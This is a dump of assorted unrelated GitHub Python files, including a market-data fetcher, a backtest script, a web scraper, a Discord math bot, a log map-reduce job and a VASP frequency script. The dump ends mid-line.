\"seconds\")\n logging.info(\"Time elapsed to fetch and save Nifty data = %s seconds\", str(int(elapsed_time)))\n\n # Bank Nifty data\n logging.info(\"Fetching Bank Nifty data...\")\n start_fetch = time.time()\n bank_nifty_nearest, df_bank_nifty_list = self.dataFetcher.fetch_data(self.init_vars.number, self.init_vars.step[\"bnf\"], self.init_vars.stock[\"bnf\"], self.init_vars.urls[\"url_bnf\"], exp_date)\n\n # Export data to Excel for Bank Nifty\n for i, df_bank_nifty in enumerate(df_bank_nifty_list):\n self.export_to_excel(df_bank_nifty, \"Bank_Nifty_Data\", exp_date[i])\n\n end_fetch = time.time()\n # Calculate the time taken during this iteration\n elapsed_time = end_fetch - start_fetch\n print(\"Time elapsed to fetch and save Bank Nifty data =\", int(elapsed_time), \"seconds\")\n logging.info(\"Time elapsed to fetch and save Bank Nifty data = %s seconds\", str(int(elapsed_time)))\n\n return nifty_nearest, bank_nifty_nearest\n","repo_name":"kira10krishna/OC-Live-Data","sub_path":"backend/python_scripts/dataProcessor.py","file_name":"dataProcessor.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74683049155","text":"\"\"\"\"Module for miscellaneous behavior stuff\n\nFor example, stuff like extracting lick times or choice times.\nTrialSpeak shouldn't depend on stuff like that.\n\n\n # Also get the pldf and use that to get lick times\n ldf = ArduFSM.TrialSpeak.read_logfile_into_df(bdf.loc[idx, 'filename']) \n \n # Get the lick times\n lick_times = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(ldf, 'TCH')\n \n # Group them by trial number and lick type and extract times\n tt2licks = lick_times.groupby(['trial', 'arg0']).groups\n for (trial, lick_type) in tt2licks:\n tt2licks[(trial, lick_type)] = \\\n ldf.loc[tt2licks[(trial, lick_type)], 'time'].values / 1000.\n \n # Get response window time as first transition into response window\n state_change_df = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(\n ldf, 'ST_CHG2')\n rwin_open_times = my.pick_rows(state_change_df, \n arg1=state_name2num['RESPONSE_WINDOW'])\n rwin_open_times_by_trial = rwin_open_times.groupby(\n 'trial').first()['time'] / 1000.\n \n # Get choice time as first transition out of response window\n state_change_df = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(\n ldf, 'ST_CHG2')\n rwin_close_times = my.pick_rows(state_change_df, \n arg0=state_name2num['RESPONSE_WINDOW'])\n rwin_close_times_by_trial = rwin_close_times.groupby(\n 'trial').first()['time'] / 1000.\n\"\"\"\nimport MCwatch\nimport ArduFSM\nimport numpy as np\n\ndef get_choice_times(behavior_filename, verbose=False):\n \"\"\"Calculates the choice time for each trial in the logfile\"\"\"\n # Find the state number for response window\n state_num2names = MCwatch.behavior.db.get_state_num2names() \n resp_win_num = dict([(v, k) for k, v in list(state_num2names.items())])[\n 'RESPONSE_WINDOW']\n \n # Get the lines\n lines = ArduFSM.TrialSpeak.read_lines_from_file(behavior_filename)\n parsed_df_by_trial = \\\n ArduFSM.TrialSpeak.parse_lines_into_df_split_by_trial(lines, \n verbose=verbose)\n \n # Identify times of state change out of response window\n # No sense in warning because there's also multiple state changes on\n # rewarded trials\n choice_times = ArduFSM.TrialSpeak.identify_state_change_times(\n parsed_df_by_trial, state0=resp_win_num, show_warnings=False)\n \n return choice_times \n\ndef get_included_trials(trial_times, data_range, t_start=0, t_stop=0):\n \"\"\"Identify the trials included in a temporal range.\n \n trial_times : Series of trial times (e.g., rwin times) indexed by\n trial labels\n \n data_range : 2-tuple (start, stop) specifying interval to include\n \n t_start, t_stop : amount of time before (after) each trial time that\n must be within data_range in order for that trial to be included.\n \n Returns: trial_labels that are included \n\n Ex:\n ## Get the trial matrix\n tm = MCwatch.behavior.db.get_trial_matrix(vs.bsession_name, True)\n\n # Include all random trials\n tm = my.pick_rows(tm, isrnd=True, outcome=['hit', 'error'])\n \n # Identify range of trials to include\n video_range_bbase = extras.get_video_range_bbase(vs)\n included_trials = extras.get_included_trials(tm['rwin_time'], \n data_range=video_range_bbase, t_start=-2, t_stop=0)\n tm = tm.loc[included_trials]\n \"\"\"\n return trial_times[\n (trial_times + t_start >= data_range[0]) &\n (trial_times + t_stop < data_range[1])\n ].index\n","repo_name":"cxrodgers/MCwatch","sub_path":"behavior/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70249190276","text":"from calculo import Calculo\nimport PySimpleGUI as sg\n\ndef main():\n calcular = Calculo()# objeto calculo\n layout = [[sg.Text('''Esta aplicação tem como finalidade demonstrar os valores que serão gastos\n com combustível durante uma viagem, com base no consumo do seu veículo, e\n com a distância determinada por você!''')],\n [sg.Text('''Os combustíveis disponíveis para este cálculo são: \n •\tÁlcool\n •\tDiesel\n •\tGasolina''')],\n [sg.Text('Distância a ser percorrida (KM):'), sg.Input(key='distancia')],# Entrada de distancia do usuario\n [sg.Text('Consumo por litro: '), sg.Input(key='litro')],# Entrada de litros do usuario\n [sg.Button('Calcular consumo')],# botão de calculo\n [sg.Output(size= (50, 20))]# Saida\n ]\n\n\n window = sg.Window('Calculadora de combustivel ', layout)\n while True:\n event, values = window.read()\n\n if event == sg.WIN_CLOSED:\n break\n\n distancia = float(values['distancia'])\n litro = float(values['litro'])\n\n print(calcular.calcular_gasto(distancia, litro))\n\nif __name__ == \"__main__\":\n main()","repo_name":"AlSolidade02/ScriptPython","sub_path":"CALCULADORA DE COMBUSTIVEL/main combustivel.py","file_name":"main combustivel.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29576021600","text":"'''solution by https://github.com/Defelo''' \nimport re\nbags = open('07_input.txt', 'r').read().splitlines()\n\ng = {}\nfor line in bags:\n a = re.match(r\"^([a-z]+ [a-z]+) bags\", line).group(1)\n\n b = re.findall(r\"(\\d+) ([a-z]+ [a-z]+) bags?\", line)\n g.setdefault(a, []).extend(b)\ncnt = -1\nq = [(1, \"shiny gold\")]\nwhile q:\n n, p = q.pop(0)\n \n cnt += n\n q += [(n * int(a), b) for a, b in g.get(p, [])]\nprint(cnt)","repo_name":"SH1RL0CK/advent_of_code","sub_path":"2020/07_puzzle2.py","file_name":"07_puzzle2.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28421570562","text":"from tempfile import mkdtemp\r\nimport zipfile\r\nimport logging\r\nimport shutil\r\nimport os\r\n\r\nfrom thief.auction.models import AuctionConfigs\r\nfrom thief.auction.forms import AuctionConfigsForm\r\nfrom thief.auction import csv_rules\r\n\r\nTEMP_PREFIX = \"tmp_auction_\"\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass CsvPacker(object):\r\n def get_csv_engine(self, type):\r\n if type == 'yahoo':\r\n return csv_rules.YahooRule(self.csv_file, 'w')\r\n elif type == 'ruten':\r\n return csv_rules.RutenRule(self.csv_file, 'w')\r\n elif type == 'rakuten':\r\n return csv_rules.RakutenRule(self.csv_file, 'w')\r\n\r\n @property\r\n def archive_path(self):\r\n return os.path.join(self.tempdir, \"archive.zip\")\r\n\r\n def __init__(self, auction_type):\r\n self.tempdir = mkdtemp(prefix=TEMP_PREFIX)\r\n self.csv_filename = os.path.join(self.tempdir, \"table.csv\")\r\n self.csv_file = open(self.csv_filename, \"wb\")\r\n \r\n gf = AuctionConfigsForm({c.key:c.value for c in AuctionConfigs.objects.all()})\r\n gf.full_clean()\r\n self.default_data = gf.cleaned_data\r\n\r\n self.csv = self.get_csv_engine(auction_type)\r\n if not self.csv: raise RuntimeError(\"Bad auction type\")\r\n\r\n self.archive = zipfile.ZipFile(self.archive_path, 'w')\r\n\r\n def pack(self, products):\r\n for p in products:\r\n meta, attach_files = p.export()\r\n meta = dict(self.default_data.items() + meta.items())\r\n self.csv.writerow(meta)\r\n\r\n for local, archname in attach_files:\r\n self.archive.write(local, archname)\r\n\r\n def get_fileobject(self):\r\n archname = self.csv.close_write()\r\n self.archive.write(self.csv_filename, archname)\r\n self.archive.close()\r\n\r\n return open(self.archive_path, \"rb\")\r\n\r\nclass CsvUnpacker(object):\r\n def get_csv_engine(self, type):\r\n if type == 'yahoo':\r\n return csv_rules.YahooRule(self.csv_file, 'r')\r\n elif type == 'ruten':\r\n return csv_rules.RutenRule(self.csv_file, 'r')\r\n \r\n def __init__(self, auction_type, file):\r\n self.csv_file = file\r\n self.csv = self.get_csv_engine(auction_type)\r\n \r\n def load(self):\r\n return [i for i in self.csv.readrows()]\r\n","repo_name":"yagami-cerberus/thief","sub_path":"thief/auction/csv_packer.py","file_name":"csv_packer.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69988126274","text":"# -*- encoding: utf-8 -*-\nimport time\nimport pandas as pd\nimport numpy as np\nfrom DataApi import quantosToken \n\nfrom jaqs.data import DataApi\n\nfrom jaqs.data import RemoteDataService\nfrom jaqs.trade import AlphaBacktestInstance\nfrom jaqs.trade import PortfolioManager\n#from jaqs.trade import RealTimeTradeApi\n\nimport jaqs.util as jutil\nimport jaqs.trade.analyze as ana\nfrom jaqs.trade import AlphaStrategy\nfrom jaqs.trade import AlphaTradeApi\nfrom jaqs.trade import model\nfrom jaqs.data import DataView\n\n# 设置文件存储路径\ndataview_dir_path = 'demoStrategy/dataview'\nbacktest_result_dir_path = 'demoStrategy'\n\n\ndata_config = {\n \"remote.data.address\": \"tcp://data.quantos.org:8910\",\n \"remote.data.username\": quantosToken.phone,\n \"remote.data.password\": quantosToken.key}\ntrade_config = {\n \"remote.trade.address\": \"tcp://gw.quantos.org:8901\",\n \"remote.trade.username\": quantosToken.phone,\n \"remote.trade.password\": quantosToken.key}\n\n# 设置Strategy number, 根据自己的实际情况设置\n# 例如:StrategyNo = 1043\nStrategyNo = 1045\n\n# -------------------------------------------------------------------------------\n# 设置目标股票、业绩基准、权重、时间\n# -------------------------------------------------------------------------------\nsymbol_weights = {'600519.SH': 0.25,\n '600036.SH': 0.25,\n '601318.SH': 0.25,\n '000651.SZ': 0.25}\n\nbenchmark = '000300.SH'\n\nmy_symbols = ','.join(symbol_weights.keys())\nstart_date = 20170201\nend_date = 20171001\n\n# 定义权重函数\ndef stockWeight(context, user_options=None):\n return pd.Series(symbol_weights)\n\n# -------------------------------------------------------------------------------\n# Main code 这个代码框不需要修改\n# -------------------------------------------------------------------------------\n\ndef test_save_dataview():\n ds = RemoteDataService()\n ds.init_from_config(data_config)\n dv = DataView()\n\n props = {'start_date': start_date, 'end_date': end_date,\n 'fields': 'sw1',\n 'symbol': my_symbols,\n 'freq': 1}\n\n dv.init_from_config(props, ds)\n dv.prepare_data()\n\n # set the benchmark\n res, _ = ds.daily(benchmark, start_date=dv.start_date, end_date=dv.end_date)\n dv._data_benchmark = res.set_index('trade_date').loc[:, ['close']]\n\n dv.save_dataview(folder_path=dataview_dir_path)\n\n\ndef test_alpha_strategy_dataview():\n dv = DataView()\n\n dv.load_dataview(folder_path=dataview_dir_path)\n\n props = {\n \"symbol\": dv.symbol,\n \"universe\": ','.join(dv.symbol),\n\n \"start_date\": dv.start_date,\n \"end_date\": dv.end_date,\n\n \"period\": \"week\",\n \"days_delay\": 0,\n\n \"init_balance\": 1e7,\n \"position_ratio\": 1.0,\n \"commission_rate\": 2E-4 # 手续费万2\n }\n props.update(data_config)\n props.update(trade_config)\n\n trade_api = AlphaTradeApi()\n\n signal_model = model.FactorSignalModel()\n signal_model.add_signal('stockWeight', stockWeight)\n\n strategy = AlphaStrategy(signal_model=signal_model, pc_method='factor_value_weight')\n pm = PortfolioManager()\n\n bt = AlphaBacktestInstance()\n \n context = model.Context(dataview=dv, instance=bt, strategy=strategy, trade_api=trade_api, pm=pm)\n \n signal_model.register_context(context)\n\n bt.init_from_config(props)\n\n bt.run_alpha()\n\n bt.save_results(folder_path=backtest_result_dir_path)\n \n\ndef test_backtest_analyze():\n ta = ana.AlphaAnalyzer()\n dv = DataView()\n dv.load_dataview(folder_path=dataview_dir_path)\n\n ta.initialize(dataview=dv, file_folder=backtest_result_dir_path)\n\n ta.do_analyze(result_dir=backtest_result_dir_path, selected_sec=ta.universe,\n brinson_group=None)\n\n# 运行这里跑回测\ntest_save_dataview()\ntest_alpha_strategy_dataview()\ntest_backtest_analyze()","repo_name":"baqiang/datatest","sub_path":"alphaSimple.py","file_name":"alphaSimple.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4192146014","text":"import sys\nimport re\nimport multiprocessing as mp\nimport time\n\ndef mapper(ifile, ofile):\n res_pattern = re.compile(r'\\.(png|jpg|gif|ico|mp4|mp3|flv|html|css|js|php)*', re.IGNORECASE)\n fi = open(ifile,'r')\n fo = open(ofile,'w')\n lines = fi.readlines()\n for line in lines:\n fields = line.strip().split()\n # extracting ip and the resource\n ip = fields[0]\n req_type = fields[5][1:]\n resource = fields[6]\n # print only if there is a resource and it's a GET request\n if res_pattern.search(resource):\n if req_type=='GET':\n fo.write(\"%s\\t%s\\n\"%(ip, resource))\n\ndef combiner(ifile, ofile):\n fi = open(ifile,'r')\n fo = open(ofile,'w')\n lines = fi.readlines()\n\n res_dict = {}\n\n for line in lines:\n fields = line.strip().split(\"\\t\")\n\n if len(fields) < 2:\n continue\n \n ip, resource = fields[0], fields[1]\n\n if ip not in res_dict.keys():\n res_dict[ip] = set()\n \n res_dict[ip].add(resource)\n\n for key, resources in res_dict.items():\n fo.write('%s\\t%s\\n' % (key, ','.join(resources)))\n\ndef reducer(files):\n result = open('par_result.txt','w')\n \n lines = []\n for file in files:\n f = open(file, 'r')\n flist = f.readlines()\n lines += flist\n f.close()\n\n # dictionary to store {ip : resourceList}\n network_dict = {}\n\n for line in lines:\n fields = line.strip().split(\"\\t\")\n\n if len(fields) < 2:\n continue \n\n ip, resource = fields[0], fields[1]\n # storing the resources requested by an ip in a set inside a dictionary\n if ip not in network_dict:\n network_dict[ip] = set()\n reslist = resource.split(\",\")\n for res in reslist:\n network_dict[ip].add(res)\n else:\n reslist = resource.split(\",\")\n for res in reslist:\n network_dict[ip].add(res)\n\n # function to count number of connected components in the network\n def connected_comps(ip_resource_dict):\n # dictionary to store {resource : ipList}\n network = {}\n # Iterating over network_dict to generate network graph\n for ip, resources in ip_resource_dict.items():\n for resource in resources:\n if resource not in network:\n network[resource] = set()\n network[resource].add(ip)\n\n # variables to store unique resources\n key1 = set()\n key2 = set()\n\n for resource in network.keys():\n key1.add(resource)\n key2.add(resource)\n \n for k1 in key1:\n for k2 in key2:\n # if the resource is still there in dictionary\n if k1!=k2 and (k2 in network.keys()) and (k1 in network.keys()):\n iplist1 = network[k1]\n iplist2 = network[k2]\n flag = False\n # check intersection between two lists of ips of two different resources\n for ip1 in iplist1:\n for ip2 in iplist2:\n if ip1==ip2:\n flag=True\n break\n if flag==True:\n break\n # If intersection found, merge the two lists into one list to make connected component\n if flag==True:\n for ip in iplist2:\n network[k1].add(ip)\n # remove the old list from dictionary\n network.pop(k2)\n return network\n\n con_comp = connected_comps(network_dict)\n # variable to count disconnected pairs\n discon_pairs = 0\n # list to record size of iplists\n sizes = []\n\n for res, li in con_comp.items():\n sizes.append(len(li))\n\n for i, s in enumerate(sizes):\n for j, s2 in enumerate(sizes):\n if j > i:\n discon_pairs += s*s2\n\n result.write(str(discon_pairs))\n\ninputfiles = [\n 'access_log11.txt',\n 'access_log12.txt'\n]\n\n# 2 output files\noutputfiles = [\n 'token1.txt',\n 'token2.txt'\n]\n\n# 2 aggregation files\naggfiles = [\n 'agg1.txt',\n 'agg2.txt'\n]\n\nstarttime = time.time()\n\nprocesses = [mp.Process(target=mapper, args=[inputfiles[i], outputfiles[i]]) for i in range(2)]\n\nfor p in processes:\n p.start()\nfor p in processes:\n p.join()\n\nprocesses = [mp.Process(target=combiner, args=[outputfiles[i], aggfiles[i]]) for i in range(2)]\n\nfor p in processes:\n p.start()\nfor p in processes:\n p.join()\n\nreducer(aggfiles)\n\nprint(\"Elapsed time (in seconds): \", (time.time() - starttime))","repo_name":"yashpaneliya/CS69202-Design-Lab","sub_path":"NoSQL-2/Query2/par_mapper.py","file_name":"par_mapper.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8846784889","text":"\"\"\"\n\n\"\"\"\nfrom notifications import SNSNotificationPublisher\n\n\ndef lambda_handler(event, context):\n topic_arn = event.get(\"topic_arn\")\n subject = event.get(\"subject\")\n message_body = event.get(\"message_body\")\n\n SNSNotificationPublisher.publish_message(\n topic_arn=topic_arn,\n subject=subject,\n message_body=message_body,\n )\n","repo_name":"jszafran/personal-aws-data-lake","sub_path":"src/common/lambda/publish_message.py","file_name":"publish_message.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21694730544","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom requests.exceptions import RequestException\nimport time\nimport logging\nimport pyscopg2\n\ndef read_urls_from_file(file_path):\n with open(file_path, 'r') as file:\n urls = [line.strip() for line in file]\n return urls\n\ndef send_request(url):\n headers = {'User-Agent': 'Mozilla/5.0'}\n try:\n response = requests.get(url, headers=headers)\n response.raise_for_status() # Raises a HTTPError if the status is 4xx, 5xx\n return response\n except RequestException as e:\n logging.error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\ndef parse_html(response):\n return BeautifulSoup(response.content, 'html.parser')\n\ndef extract_titles(soup):\n article_elements = soup.find_all('article')\n return [element.find('h2').text.strip() for element in article_elements]\n\ndef save_data(departamento):\n try:\n conn = psycopg2.connect(\n host=\"postgres\",\n database=\"postgres\",\n user=\"xbz\",\n password=\"1234\"\n )\n cur = conn.cursor()\n # Inserta en la tabla Departamentos\n cur.execute(\"\"\"\n INSERT INTO Departamentos (titulo, descripcion, precio, ubicacion_id, dormitorios, banios, area) \n VALUES (%s, %s, %s, %s, %s, %s, %s)\n RETURNING id_departamento\n \"\"\", (departamento['titulo'], departamento['descripcion'], departamento['precio'], departamento['ubicacion_id'], \n departamento['dormitorios'], departamento['banios'], departamento['area']))\n id_departamento = cur.fetchone()[0]\n # Inserta en la tabla Ubicaciones si no existe\n cur.execute(\"\"\"\n INSERT INTO Ubicaciones (id_ubicacion, nombre) \n VALUES (%s, %s)\n ON CONFLICT (id_ubicacion) DO NOTHING\n \"\"\", (departamento['ubicacion_id'], departamento['ubicacion_nombre']))\n\n # Inserta en las tablas Amenidades y Departamento_Amenidad\n for amenidad in departamento['amenidades']:\n cur.execute(\"\"\"\n INSERT INTO Amenidades (nombre) \n VALUES (%s)\n ON CONFLICT (nombre) DO UPDATE SET nombre = excluded.nombre\n RETURNING id_amenidad\n \"\"\", (amenidad,))\n \n id_amenidad = cur.fetchone()[0]\n\n cur.execute(\"\"\"\n INSERT INTO Departamento_Amenidad (id_departamento, id_amenidad) \n VALUES (%s, %s)\n \"\"\", (id_departamento, id_amenidad))\n conn.commit()\n cur.close()\n conn.close()\n\n except psycopg2.DatabaseError as e:\n print(f'Error {e}')\n return None\ndef scrape_website(url):\n for i in range(3): # Retry up to 3 times\n response = send_request(url)\n if response is not None:\n soup = parse_html(response)\n titles = extract_titles(soup)\n save_data(titles)\n break\n else:\n time.sleep(2**i) # Exponential backoff\n else:\n logging.error('Failed to retrieve website content after 3 attempts.')\n\n# Example usage\nurls_file_path = 'urls.txt' # Replace with your file path\nurls = read_urls_from_file(urls_file_path)\nfor url in urls:\n scrape_website(url)\n\n","repo_name":"Xbz-24/Scrapers","sub_path":"scraperv2.py","file_name":"scraperv2.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71194918273","text":"import discord\nfrom discord.ext import commands, tasks\nimport os\nfrom sympy import *\nfrom PIL import Image, ImageDraw, ImageFont\n\nprefixes = ['szgabi', '+']\n\ndef makeimg(txt):\n filename = \"img.png\"\n image = Image.new(mode = \"RGB\", size = (len(txt)*14+6, 50), color = \"white\")\n fnt = ImageFont.truetype('arial.ttf', 30)\n draw = ImageDraw.Draw(image)\n draw.text((1,5), txt.replace('**','^'), font=fnt, fill=(0,0,0))\n\n image.save(filename)\n return filename\n\nasync def get_prefix(client, message):\n if not message.guild:\n return\n return commands.when_mentioned_or(*prefixes)(client, message)\n\nclient = commands.Bot(command_prefix = get_prefix, status = discord.Status.idle, activity=discord.Game(name=\"Booting..\"))\n\n@client.event\nasync def on_ready():\n\t\tprint('Lets rock!')\n\t\tprint(client.user.name)\n\t\tprint(client.user.id)\n\t\tprint(client.guilds)\n\t\tprint(\"----------\")\n\t\tawait client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"students cry\"))\n\n\"\"\"\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n client.load_extension(f'cogs.{filename[:-3]}')\n \"\"\"\n\n@client.event\nasync def on_message(message):\n print(f'{message.content}')\n await client.process_commands(message)\n \n@client.command(description='Kills the bot')\nasync def kys(ctx):\n if ctx.author.id == 297689894208274432:\n await ctx.channel.send(\"T Ö :regional_indicator_r: T É N E T E S E N\")\n await client.logout()\n exit()\n else: await ctx.channel.send(\"You jerk!\")\n\n@client.command()\nasync def iintegral(ctx, fv, dt):\n x = Symbol(dt)\n summa = integrate(fv,x)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def integral(ctx, fv, dt, a, b):\n x = Symbol(dt)\n summa = integrate(fv, (x, a, b))\n summma = integrate(fv, x)\n await ctx.send(\"A határozatlan integrálja:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summma))}'))\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def derival(ctx, fv, dt, number):\n x = Symbol(dt)\n summa = diff(fv, x, number)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def limes(ctx, fv, a, b):\n summa = limit(fv, a, b)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def join(ctx):\n await ctx.author.voice.channel.connect()\n\n@client.command()\nasync def leave(ctx):\n await ctx.voice_client.disconnect()\n\n@client.command(description ='Asks for server latency')\nasync def ping(ctx):\n\tping_ = client.latency\n\tping = round(ping_ *1000)\n\tawait ctx.channel.send(f\"Késik a kép drága? Csakis ennyit késhet {ping}ms\")\n\n@client.group()\nasync def prefix(ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Invalid command passed...')\n\n@prefix.command()\nasync def add(ctx, prefix):\n global prefixes\n if prefix in prefixes:\n await ctx.channel.send('Már létezik, te literális majom! :rofl:')\n else:\n prefixes.append(prefix)\n await ctx.channel.send(f'Added `{prefix}` to the prefix list. :ok_hand:')\n\n@prefix.command()\nasync def remove(ctx, prefix):\n if prefix in prefixes:\n prefixes.remove(prefix)\n await ctx.channel.send(f'Removed `{prefix}` from the prefix list.')\n else:\n await ctx.channel.send('Nincs ilyen prefix! :angry::anger:')\n\n@prefix.command()\nasync def list(ctx):\n msgs = '['\n msg = ''\n for x in prefixes:\n msg = msg+ msgs+ x+'] '\n await ctx.channel.send(f'```{msg}```')\n\nclient.run(\"\")\n\n","repo_name":"Bende126/vikbot","sub_path":"doomers/szgabi.py","file_name":"szgabi.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17906064602","text":"#!/usr/bin/env python3\n\n# Version 0.1\nimport numpy as np\n\nprint(' Recalculation of vibrational frequencies from Hessian matrix')\n\ndef CodeStatus(inStr, **kwargs):\n\tprint(' '*kwargs.get('l',4) + '> '+ inStr, end=kwargs.get('end','\\n'))\n\ndef FixNumBlanck(ifloat, **kwargs):\n\tdec = '{:.'+str(kwargs.get('d',4))+'f}'\n\tlength = kwargs.get('l', 10)\n\tstrout = dec.format(ifloat)\n\tif len(strout)<length: strout = ' '*(length-len(strout))+strout\n\treturn strout\n\ndef FixBlanck(iStr, **kwargs):\n\tlength = kwargs.get('l', 10)\n\tstrout = iStr\n\tif len(strout)<length: strout = ' '*(length-len(strout))+strout\n\treturn strout\n\n################################################################################################################################\n################################################################################################################################\n\n############ Check Information in POSCAR\ntry:\n\t# Open, read and extract information nedded\n\twith open('POSCAR','r') as f:\n\t\tPOSCAR = f.readlines()\n\t\tAtomType_POSCAR = POSCAR[5].split()\n\t\tAtomQuant_POSCAR = [int(iT) for iT in POSCAR[6].split()]\n\t# Report\n\tstrPOSCAR = ''\n\tfor i,j in zip(AtomQuant_POSCAR, AtomType_POSCAR): strPOSCAR +=str(i)+' '+j+', '\n\tCodeStatus('POSCAR file found and properly read: '+strPOSCAR[:-2])\n\n\t############################################################################################\n\t#### Created: \tAtomType_POSCAR = ['Atom name 1', 'Atom name 2']\n\t####\t\t\tAtomQuant_POSCAR = ['Amomunt of Atom 1', 'Amount of Atom 2', ...]\n\t############################################################################################\n\nexcept:\n\tquit(' '*8+'>>>> Is there something wrong with the POSCAR file? Is it there? are atomic types in the 6th line?')\n\n\n############ Check Information in POTCAR\ntry:\n\t# Open POTCAR, get Atomic names and POMASS mases\n\twith open('POTCAR','r') as f:\n\t\tAtomType_POTCAR = []\n\t\tAtomMass_POTCAR = []\n\t\tfor iLine in f.readlines():\n\t\t\tif 'VRHFIN' in iLine: AtomType_POTCAR.append(iLine.split('=')[1].split(':')[0])\n\t\t\telif 'POMASS' in iLine: AtomMass_POTCAR.append(float(iLine.split('=')[1].split(';')[0]))\n\n\t# Check POTCAR mass information is complete (each ato m type has a mass)\n\tif not len(AtomType_POTCAR) == len(AtomMass_POTCAR): quit(' ' * 8 + '>>>> Mass information is missing. Something is wrong with the POTCAR file.')\n\n\t# Report\n\tCodeStatus('POTCAR has been found and properly read')\n\nexcept:\n\tquit(' '*8+'>>>> There is something wrong with the POTCAR file. Is it there?')\n\n############ Check POTCAR and POSCAR coincide\nif not AtomType_POTCAR == AtomType_POSCAR: quit(' '*8+'>>>> POTCAR and POTCAR species does not coincide. POSCAR='+str(AtomType_POSCAR)+' / POTCAR='+str(AtomType_POTCAR))\n\n\n\t############################################################################################\n\t#### Created: \tAtomType_POTCAR = ['Atom name 1', 'Atom name 2']\n\t####\t\t\tAtomMass_POSCAR = ['Mass of Atom 1', 'Mass of Atom 2', ...]\n\t############################################################################################\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n#### Consolidate parametric information\n\n#### Construct dictionary Atom mases\nAtomMass = {}\nfor i,j in zip(AtomType_POTCAR, AtomMass_POTCAR): AtomMass[i] = j\n# CodeStatus('Atom masses dictionary created in the form \\'Atom name\\':\\'Atom mass\\'')\nCodeStatus('Atom masses dictionary : ' + str(AtomMass)) # Debug\n\n#### Create Atom List dictionary: Atom_index['Atom number'] = 'Atom name'\nAtom_index = {}\nAtomCounter = 0\nfor i, j in zip(AtomQuant_POSCAR, AtomType_POSCAR):\n\tfor k in range(int(i)):\n\t\tAtomCounter += 1\n\t\tAtom_index[str(AtomCounter)] = [j,AtomMass[j]]\nCodeStatus('Atom index created = {\\'Atom index number : [\\'Atom name\\', Atom mass]}')\nCodeStatus('Atom index created = {' + list(Atom_index.keys())[0]+':'+str(list(Atom_index.values())[0])+' ... '+ list(Atom_index.keys())[-1]+':'+str(list(Atom_index.values())[-1])+'}') # Debug\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n#### Wish to modify?\nModifiying = True\nwhile Modifiying:\n\tif input(' '*4+'> Wish to modify some mases ? (y/def=n) : ') == 'y':\n\t\t#####\n\t\tprint(' '*8+'.'*40)\n\t\t#####\n\n\t\t# Ask for Modification type\n\t\tModificationType = str(input(' '*8+'> Modify by atom type (def=t) or by atom index (i) ? : '))\n\t\tif ModificationType == '': ModificationType = 't'\n\n\t\tif not ModificationType in ['t','i']:\n\t\t\tCodeStatus('Option has to be \\'t\\' (for atom type, default option) or \\'i\\' (for atom index), try again.')\n\t\t\tcontinue\n\n\t\t# Modify by atom type\n\t\tif ModificationType == 't':\n\t\t\t# Ask for atom name\n\t\t\ttry:\n\t\t\t\tModyAtomName = input(' '*12+'> Modify mass of atom (name) : ')\n\t\t\t\tAtomMass[ModyAtomName]\n\t\t\texcept:\n\t\t\t\tCodeStatus('Atom type not recognized, Come again ?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Ask for new mass\n\t\t\ttry:\n\t\t\t\tModifyAtomMass = float(input(' '*12+'> New mass (g/mol) of atom : '))\n\t\t\texcept:\n\t\t\t\tCodeStatus('Mass not recognized. Sure it was a number?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Modify registry\n\t\t\tAtomMass.pop(ModyAtomName)\n\t\t\tAtomMass[ModyAtomName+'-Istp.'] = ModifyAtomMass\n\t\t\tfor k in Atom_index:\n\t\t\t\tif Atom_index[k][0] == ModyAtomName: Atom_index[k] = [ModyAtomName+'-Istp', ModifyAtomMass]\n\t\t\tCodeStatus('New dict. of masses : ' + str(AtomMass), 